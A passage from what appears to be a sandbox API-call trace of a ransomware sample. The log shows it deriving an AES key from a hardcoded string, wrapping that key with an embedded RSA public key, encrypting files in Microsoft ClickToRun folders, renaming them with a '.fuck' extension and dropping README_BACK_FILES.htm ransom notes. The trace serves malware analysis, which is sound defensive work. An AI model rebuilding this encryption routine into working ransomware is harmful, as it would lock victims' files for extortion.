szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8ee8) returned 1 [0235.729] CryptCreateHash (in: hProv=0x27e8ee8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.730] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.730] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.730] CryptDeriveKey (in: hProv=0x27e8ee8, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebc60) returned 1 [0235.730] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.730] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.730] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8998) returned 1 [0235.733] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8998, dwCertEncodingType=0x1, pInfo=0x27f6ef8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6f28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6f30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eb920) returned 1 [0235.733] CryptEncrypt (in: hKey=0x27eb920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.733] CryptEncrypt (in: hKey=0x27eb920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8f70*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8f70*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.733] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8f70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.733] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.733] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.733] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.733] CloseHandle (hObject=0xffffffff) returned 1 [0235.733] CloseHandle (hObject=0xffffffff) returned 1 [0235.733] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml"), bFailIfExists=0) returned 0 [0235.734] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml", dwFileAttributes=0x0) returned 0 [0235.734] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.gsg")) returned 0 [0235.734] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.fuck")) returned 0 [0235.735] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.735] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0235.735] CryptReleaseContext (hProv=0x27e8ee8, dwFlags=0x0) returned 1 [0235.735] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.735] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.735] GetLastError () returned 0x5 [0235.735] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash")) returned 0x20 [0235.735] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x80) returned 0 [0235.735] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.736] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.736] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.736] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e9e50) returned 1 [0235.746] CryptCreateHash (in: hProv=0x27e9e50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.746] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.746] CryptHashData (hHash=0x27ebe60, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.746] CryptDeriveKey (in: hProv=0x27e9e50, Algid=0x6610, hBaseData=0x27ebe60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebc20) returned 1 [0235.746] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.746] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.746] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e9328) returned 1 [0235.749] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9328, dwCertEncodingType=0x1, pInfo=0x27f7578*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f75a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f75b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebea0) returned 1 [0235.749] CryptEncrypt (in: hKey=0x27ebea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.749] CryptEncrypt (in: hKey=0x27ebea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9a10*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e9a10*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.749] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9a10, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.749] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.749] CryptEncrypt (in: hKey=0x27ebc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.749] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.749] CloseHandle (hObject=0xffffffff) returned 1 [0235.749] CloseHandle (hObject=0xffffffff) returned 1 [0235.749] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash"), bFailIfExists=0) returned 0 [0235.750] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x0) returned 0 [0235.750] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.gsg")) returned 0 [0235.750] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.fuck")) returned 0 [0235.751] CryptDestroyHash (hHash=0x27ebe60) returned 1 [0235.751] CryptDestroyKey (hKey=0x27ebc20) returned 1 [0235.751] CryptReleaseContext (hProv=0x27e9e50, dwFlags=0x0) returned 1 [0235.751] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.751] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.751] GetLastError () returned 0x5 [0235.751] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0235.751] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0235.751] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.752] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.752] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0235.752] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8ee8) returned 1 [0235.761] CryptCreateHash (in: hProv=0x27e8ee8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.762] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.762] CryptHashData (hHash=0x27ebc60, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.762] CryptDeriveKey (in: hProv=0x27e8ee8, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb8a0) returned 1 [0235.762] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.762] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.762] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8118) returned 1 [0235.765] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8118, dwCertEncodingType=0x1, pInfo=0x27f61f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6228*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6230*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebbe0) returned 1 [0235.765] CryptEncrypt (in: hKey=0x27ebbe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.765] CryptEncrypt (in: hKey=0x27ebbe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9a98*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e9a98*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.765] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9a98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.765] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.765] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.765] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.765] CloseHandle (hObject=0xffffffff) returned 1 [0235.765] CloseHandle (hObject=0xffffffff) returned 1 [0235.765] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0235.766] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0235.766] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0235.766] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0235.767] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.767] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0235.767] CryptReleaseContext (hProv=0x27e8ee8, dwFlags=0x0) returned 1 [0235.767] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0235.767] FindClose (in: hFindFile=0x27ebd60 | out: hFindFile=0x27ebd60) returned 1 [0235.767] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0235.767] AreFileApisANSI () returned 1 [0235.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e8ee8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 122 [0235.767] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.768] GetLastError () returned 0x5 [0235.768] GetLastError () returned 0x5 [0235.768] FindNextFileA (in: hFindFile=0x27eba20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0235.768] FindClose (in: hFindFile=0x27eba20 | out: hFindFile=0x27eba20) returned 1 [0235.768] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\readme_back_files.htm")) returned 0xffffffff [0235.768] AreFileApisANSI () returned 1 [0235.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0235.768] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.768] GetLastError () returned 0x5 [0235.768] GetLastError () returned 0x5 [0235.768] FindNextFileA (in: hFindFile=0x27ebce0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0235.769] FindClose (in: hFindFile=0x27ebce0 | out: hFindFile=0x27ebce0) returned 1 [0235.769] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\readme_back_files.htm")) returned 0xffffffff [0235.769] AreFileApisANSI () returned 1 [0235.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0235.769] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.769] GetLastError () returned 0x5 [0235.769] GetLastError () returned 0x5 [0235.769] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0235.769] FindFirstFileA (in: 